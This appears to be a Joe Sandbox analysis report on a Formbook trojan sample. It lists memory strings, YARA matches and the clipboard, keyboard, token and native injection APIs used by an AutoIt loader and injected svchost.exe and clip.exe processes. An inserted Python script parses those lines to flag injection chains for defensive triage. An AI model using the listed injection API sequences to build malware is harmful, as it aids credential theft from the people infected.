Source: clip.exe, 00000005.00000002.3281277788.00000000006A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: clip.exe, 00000005.00000002.3281277788.00000000006A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: clip.exe, 00000005.00000002.3281277788.00000000006C6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: clip.exe, 00000005.00000003.2101593228.000000000759D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: clip.exe, 00000005.00000003.2101593228.000000000759D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: GtDTOqzvEb.exe, 00000008.00000002.3283553222.00000000031BE000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.strikingly.com/?utm_source=404&utm_medium=internal&utm_campaign=404_redirect
Source: clip.exe, 00000005.00000002.3284516753.0000000005B84000.00000004.10000000.00040000.00000000.sdmp, GtDTOqzvEb.exe, 00000008.00000002.3283553222.0000000003674000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.zoho.com/sites/?src=parkeddomain&dr=www.lanxuanz.tech
Source: clip.exe, 00000005.00000002.3284516753.0000000005B84000.00000004.10000000.00040000.00000000.sdmp, GtDTOqzvEb.exe, 00000008.00000002.3283553222.0000000003674000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.zoho.com/sites/images/professionally-crafted-themes.png
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_00A3EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_00A3ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_00A2AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_00A59576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

            E-Banking Fraud

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.3281124203.0000000000330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1911723289.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1911428216.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.3285172725.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3283463490.0000000004280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3283258223.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1912223834.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3282844800.0000000004B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.3281124203.0000000000330000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1911723289.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1911428216.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.3285172725.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.3283463490.0000000004280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.3283258223.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1912223834.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.3282844800.0000000004B70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: plZuPtZoTk.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: plZuPtZoTk.exe, 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_79534d3e-f
Source: plZuPtZoTk.exe, 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_3620d4cd-8
Source: plZuPtZoTk.exe | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_58f19739-4
Source: plZuPtZoTk.exe | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_d3dcf8e9-8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042C0F3 NtClose
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72B60 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B735C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B74340 NtSetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B74650 NtSuspendThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72BA0 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72BF0 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72BE0 NtQueryValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72AF0 NtWriteFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72AD0 NtReadFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72FB0 NtResumeThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72FA0 NtQuerySection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72FE0 NtCreateFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72F30 NtCreateSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72E80 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72EE0 NtQueueApcThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72DD0 NtDelayExecution
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72D30 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72D10 NtMapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72CA0 NtQueryInformationToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B72C60 NtCreateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B73090 NtSetValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B73010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B739B0 NtGetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B73D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03B73D70 NtOpenThread
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_04554650 NtSuspendThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_04554340 NtSetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_04552C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_04552C60 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_04552CA0 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_04552D10 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_04552D30 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_04552DD0 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_04552DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_04552EE0 NtQueueApcThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_04552E80 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_04552F30 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_04552FE0 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_04552FB0 NtResumeThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_04552AD0 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_04552AF0 NtWriteFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_04552B60 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_04552BF0 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_04552BE0 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_04552BA0 NtEnumerateValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_045535C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_045539B0 NtGetContextThread,LdrInitializeThunk
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_04552C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_04552CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_04552CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_04552D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_04552DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_04552E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_04552EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_04552F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_04552F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_04552FA0 NtQuerySection
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_04552AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_04552B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_04553010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_04553090 NtSetValueKey
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_04553D70 NtOpenThread
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_04553D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_00358B20 NtCreateFile
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_00358C90 NtReadFile
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_00358D80 NtDeleteFile
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_00358E20 NtClose
Source: C:\Windows\SysWOW64\clip.exe | Code function: 5_2_00358F90 NtAllocateVirtualMemory
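The Nt* stubs listed above for svchost.exe and clip.exe are the raw evidence behind the report's injection and syscall signatures: NtWriteVirtualMemory next to NtQueueApcThread, NtGetContextThread and NtSetContextThread next to NtSuspendThread and NtResumeThread, and the NtCreateSection / NtMapViewOfSection / NtUnmapViewOfSection trio. As an added example that is not part of the report and not Joe Sandbox's code, the Python below parses these flattened "Code function" lines (in either the spaced or the column-fused form), groups the native APIs per process, and checks them against three injection chains. The chain definitions, the reduction of the source path to an image name, and the "indirect_syscall_stubs" label (Nt* names appearing in a stub that the report also shows reaching LdrInitializeThunk) are this example's own assumptions; the sample lines are copied from the report above.

```python
"""Triage of Joe Sandbox "Code function" evidence for process-injection API chains.

Added example, not Joe Sandbox's code: parses lines of the form
"Source: <process> Code function: <id> <Api>,<Api>,...,<id>" and reports, per
process, which steps of each injection chain were seen and which Nt* stubs the
report pairs with LdrInitializeThunk. The chain definitions are assumptions.
"""
import json
import re
from collections import defaultdict

# Accepts both "svchost.exe Code function:" and the fused "svchost.exeCode function:".
LINE_RE = re.compile(
    r"Source:\s*(?P<proc>.*?)\s*Code function:\s*"
    r"(?P<fid>\d+_\d+_[0-9A-Fa-f]+):?\s*(?P<calls>[A-Za-z0-9_,]*)"
)

# Each chain lists the native calls an implant needs for that technique (assumed grouping).
INJECTION_CHAINS = {
    "apc_injection": ("NtOpenProcess", "NtAllocateVirtualMemory",
                      "NtWriteVirtualMemory", "NtQueueApcThread", "NtResumeThread"),
    "thread_hijack": ("NtSuspendThread", "NtGetContextThread",
                      "NtSetContextThread", "NtResumeThread"),
    "section_mapping": ("NtCreateSection", "NtMapViewOfSection", "NtUnmapViewOfSection"),
}

# Constructed sample: a subset of the lines in the report above, one in the fused form.
SAMPLE_LINES = r"""
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72B60 NtClose,LdrInitializeThunk,2_2_03B72B60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03B72DF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B74340 NtSetContextThread,2_2_03B74340
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B74650 NtSuspendThread,2_2_03B74650
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B72BF0 NtAllocateVirtualMemory,2_2_03B72BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B72FB0 NtResumeThread,2_2_03B72FB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B72F30 NtCreateSection,2_2_03B72F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B72EE0 NtQueueApcThread,2_2_03B72EE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B72E30 NtWriteVirtualMemory,2_2_03B72E30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B72D30 NtUnmapViewOfSection,2_2_03B72D30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B72D10 NtMapViewOfSection,2_2_03B72D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B72CF0 NtOpenProcess,2_2_03B72CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_03B739B0 NtGetContextThread,2_2_03B739B0
Source: C:\Windows\SysWOW64\clip.exe Code function: 5_2_04554650 NtSuspendThread,LdrInitializeThunk,5_2_04554650
Source: C:\Windows\SysWOW64\clip.exe Code function: 5_2_04554340 NtSetContextThread,LdrInitializeThunk,5_2_04554340
Source: C:\Windows\SysWOW64\clip.exe Code function: 5_2_04552D10 NtMapViewOfSection,LdrInitializeThunk,5_2_04552D10
Source: C:\Windows\SysWOW64\clip.exe Code function: 5_2_04552D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_04552D30
Source: C:\Windows\SysWOW64\clip.exe Code function: 5_2_04552EE0 NtQueueApcThread,LdrInitializeThunk,5_2_04552EE0
Source: C:\Windows\SysWOW64\clip.exe Code function: 5_2_04552F30 NtCreateSection,LdrInitializeThunk,5_2_04552F30
Source: C:\Windows\SysWOW64\clip.exe Code function: 5_2_04552FB0 NtResumeThread,LdrInitializeThunk,5_2_04552FB0
Source: C:\Windows\SysWOW64\clip.exe Code function: 5_2_04552BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_04552BF0
Source: C:\Windows\SysWOW64\clip.exe Code function: 5_2_045539B0 NtGetContextThread,LdrInitializeThunk,5_2_045539B0
Source: C:\Windows\SysWOW64\clip.exe Code function: 5_2_04552CF0 NtOpenProcess,5_2_04552CF0
Source: C:\Windows\SysWOW64\clip.exe Code function: 5_2_04552E30 NtWriteVirtualMemory,5_2_04552E30
Source: C:\Users\user\Desktop\plZuPtZoTk.exe Code function: 0_2_00A2D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_00A2D5EB
"""


def parse_code_functions(text):
    """Yield (image_name, function_id, [api, ...]) for every Code function line."""
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        proc = m.group("proc").rsplit("\\", 1)[-1]  # keep only the image name
        # Drop empty fields and the trailing repeat of the function id.
        apis = [a for a in m.group("calls").split(",") if a and a != m.group("fid")]
        yield proc, m.group("fid"), apis


def triage(text):
    """Per process: chain coverage, Nt* stubs paired with LdrInitializeThunk, verdict."""
    seen = defaultdict(set)     # process -> every Nt* API referenced
    via_ldr = defaultdict(set)  # process -> Nt* APIs in a stub that also hits LdrInitializeThunk
    for proc, _fid, apis in parse_code_functions(text):
        nt_apis = {a for a in apis if a.startswith("Nt")}
        seen[proc] |= nt_apis
        if "LdrInitializeThunk" in apis:
            via_ldr[proc] |= nt_apis
    report = {}
    for proc, apis in seen.items():
        chains = {}
        for name, steps in INJECTION_CHAINS.items():
            hit = [s for s in steps if s in apis]  # steps present, in chain order
            chains[name] = {"seen": hit, "complete": len(hit) == len(steps)}
        report[proc] = {
            "chains": chains,
            "indirect_syscall_stubs": sorted(via_ldr[proc]),
            "suspicious": any(c["complete"] for c in chains.values()),
        }
    return report


if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_LINES), indent=2))
```

Run stand-alone it prints a JSON verdict per image: both svchost.exe and clip.exe complete all three chains on the sample, while plZuPtZoTk.exe (the AutoIt loader, whose listed calls are Win32 rather than Nt*) is not flagged. A complete chain is a strong signal; a partial one is still worth checking against the process's memory dumps, and INJECTION_CHAINS can be extended with other technique groupings.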
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_00A2D5EB CreateFileW,DeviceIoControl,CloseHandle
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_00A21201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_00A2E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_00A32046
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_009C8060
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_00A28298
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_009FE4FF
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_009F676B
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_00A54873
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_009ECAA0
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_009CCAF0
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_009DCC39
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_009F6DD9
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_009C91C0
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_009DB119
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_009E1394
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_009E1706
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_009E781B
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_009E19B0
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_009C7920
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_009D997D
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_009E7A4A
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_009E7CA7
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_009E1C77
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_009F9EEE
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_00A4BE44
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_009E1F32
Source: C:\Users\user\Desktop\plZuPtZoTk.exe | Code function: 0_2_016E31D8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00418143
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403040
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004010F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004021DD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004021E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040F9AA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040F9B3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401260
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00416323
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040FBD3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040DBF4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040238C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402390
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040DC53
